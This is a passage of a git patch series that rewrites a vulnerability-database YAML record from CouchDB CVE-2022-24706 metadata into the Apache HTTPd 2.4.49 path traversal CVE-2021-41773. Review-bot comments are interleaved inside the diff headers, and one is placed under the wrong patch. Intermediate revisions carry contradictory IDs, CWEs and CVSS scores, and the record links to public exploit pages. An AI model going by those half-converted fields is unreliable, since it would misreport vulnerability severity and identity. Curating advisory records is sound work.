 cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml
index 50fd5093..66d2294f 100644
--- a/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml
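Review bot: The new CVE-2021-41773.yaml carries the metadata of a different vulnerability: `id: CVE-2022-24706`, the CouchDB `source`, `name` and `description`, `scope-of-influence: apache-CouchDB < 3.2.2`, every `reference` entry and the whole `classification` block describe the CouchDB Erlang-cookie issue, not the Apache HTTP Server path traversal the filename names. Patches 27–29 of this series then rewrite those fields one commit at a time, so any checkout between them ships a mislabeled advisory; squash them into this commit, or add the file only once its content is correct. The file is also written without a trailing newline (`\ No newline at end of file`), which only patch 29 eventually fixes.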
+++ b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml
@@ -1,10 +1,10 @@
-id: CVE-2022-24706
-source: https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit
+id: CVE-2021-41773
+source: https://www.exploit-db.com/exploits/50383
 info:
- name: Apache CouchDB 是一个面向文档的数据库管理系统。
+ name: Apache HTTPd 是Apache基金会开源的一款HTTP服务器。
 severity: critical
 description:
- 当CouchDB 以集群模式安装时,会开启epmd服务,并且监听相应端口。由于在默认安装过程中Apache CouchDB 将 Erlang Cookie默认设置为 monster,若未经修改,则攻击者可利用该cookie连接epmd,在知道fqdn的情况下执行任意代码,控制服务器。
+ 2021年10月8日Apache HTTPd官方发布安全更新,披露CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞。攻击者利用这个漏洞,可以读取到Apache服务器web目录以外的其他文件,或读取web中的脚本源码,如果服务器开启CGI或cgid服务,攻击者可进行任意代码执行。
 scope-of-influence:
 apache-CouchDB < 3.2.2
 reference:
-- Gitee
From 976832e463a54ca3b628e964ee51e9672dc2b88e Mon Sep 17 00:00:00 2001
From: fanyunpeng
Date: Thu, 16 Mar 2023 07:02:06 +0000
Subject: [PATCH 28/29] update cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml.
Signed-off-by: fanyunpeng
---
 .../2021/yaml/CVE-2021-41773.yaml | 18 +++++-------------
 1 file changed, 5 insertions(+), 13 deletions(-)
diff --git a/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml
index 66d2294f..b9e4b71d 100644
--- a/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml
+++ b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml
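Review bot: After this hunk `id`, `source`, `name` and `description` name CVE-2021-41773, but the context line `scope-of-influence: apache-CouchDB < 3.2.2` still describes CouchDB, and the `reference` list and `classification` block below the hunk (`cve-id: CVE-2022-24706`, `cwe-id: CWE-1188`, score 9.8) are untouched, so the record contradicts itself at this revision. Patches 28 and 29 finish the rewrite; fold them into this commit so the file is never half-converted. The new `source` points at the exploit-db page rather than the vendor announcement; the `http://www.openwall.com/lists/oss-security/2021/10/08/1` post that patch 29 adds to `reference` is the better primary source for an advisory record.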
@@ -6,22 +6,14 @@ info:
 description:
 2021年10月8日Apache HTTPd官方发布安全更新,披露CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞。攻击者利用这个漏洞,可以读取到Apache服务器web目录以外的其他文件,或读取web中的脚本源码,如果服务器开启CGI或cgid服务,攻击者可进行任意代码执行。
 scope-of-influence:
- apache-CouchDB < 3.2.2
+ Apache HTTP Server = 2.4.49
 reference:
- - http://packetstormsecurity.com/files/167032/Apache-CouchDB-3.2.1-Remote-Code-...
- - http://packetstormsecurity.com/files/169702/Apache-CouchDB-Erlang-Remote-Code...
- - http://www.openwall.com/lists/oss-security/2022/04/26/1
- - http://www.openwall.com/lists/oss-security/2022/05/09/1
- - http://www.openwall.com/lists/oss-security/2022/05/09/2
- - http://www.openwall.com/lists/oss-security/2022/05/09/3
- - http://www.openwall.com/lists/oss-security/2022/05/09/4
- - https://docs.couchdb.org/en/3.2.2/setup/cluster.html
- - https://lists.apache.org/thread/w24wo0h8nlctfps65txvk0oc5hdcnv00
- - https://medium.com/@_sadshade/couchdb-erlang-and-cookies-rce-on-default-setti...
- - https://www.openwall.com/lists/oss-security/2022/04/26/1
+ - https://apache.org/
+ - https://www.exploit-db.com/exploits/50383
+ - https://blog.csdn.net/qq_48985780/article/details/120973100
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
+ cvss-score: 4.3
 cve-id: CVE-2022-24706
 cwe-id: CWE-1188
 cnvd-id: None
-- Gitee
From e23a8933856f4f0967c5cd152f9d8ffab6bbb2d5 Mon Sep 17 00:00:00 2001
From: fanyunpeng
Date: Thu, 16 Mar 2023 07:10:33 +0000
Subject: [PATCH 29/29] update cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml.
Signed-off-by: fanyunpeng
---
 .../2021/yaml/CVE-2021-41773.yaml | 17 ++++++++++-------
 1 file changed, 10 insertions(+), 7 deletions(-)
diff --git a/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml
index b9e4b71d..420c8e1a 100644
--- a/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml
+++ b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml
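Review bot: `cvss-score: 4.3` is changed while the `cvss-metrics` context line `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` is kept, and that vector evaluates to 9.8 (the value the file had before), so the two fields now disagree; a score must never be edited without its vector. `cve-id: CVE-2022-24706` and `cwe-id: CWE-1188` also still carry the CouchDB values although `id` is CVE-2021-41773. Patch 29 corrects all three; squash it into this commit. The new `scope-of-influence: Apache HTTP Server = 2.4.49` matches the description, but `severity: critical` above the hunk will need reconciling with whichever score is finally kept.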
@@ -11,14 +11,17 @@ info:
 - https://apache.org/
 - https://www.exploit-db.com/exploits/50383
 - https://blog.csdn.net/qq_48985780/article/details/120973100
+ - https://www.oracle.com/security-alerts/cpujan2022.html
+ - http://packetstormsecurity.com/files/164941/Apache-HTTP-Server-2.4.50-Remote-Code-Execution.html
+ - http://www.openwall.com/lists/oss-security/2021/10/08/1
 classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 4.3
- cve-id: CVE-2022-24706
- cwe-id: CWE-1188
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2021-41773
+ cwe-id: CWE-22
 cnvd-id: None
 kve-id: None
 tags:
- - 不安全的默认资源初始化
- - 弱口令要求
- - 远程代码执行
\ No newline at end of file
+ - Apache HTTP Serve
+ - 路径穿越
+ - 任意文件读取
-- Gitee
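Review bot: The new tag `Apache HTTP Serve` is missing its last letter and should read `Apache HTTP Server`, matching the `scope-of-influence` line. The vector `C:H/I:N/A:N` with `cvss-score: 7.5` classifies the entry as a read-only disclosure, yet `severity: critical` at the top of the file (outside this hunk) is unchanged and the description still asserts arbitrary code execution when CGI/cgid is enabled — either lower the severity to match the score or note in the description that the execution case is conditional on that configuration. The added packetstorm reference is titled for 2.4.50, which `Apache HTTP Server = 2.4.49` excludes; confirm whether it belongs here or with the separate CVE-2021-42013 directory created earlier in this series. `cve-id: CVE-2021-41773` and `cwe-id: CWE-22` are now correct for a path traversal entry.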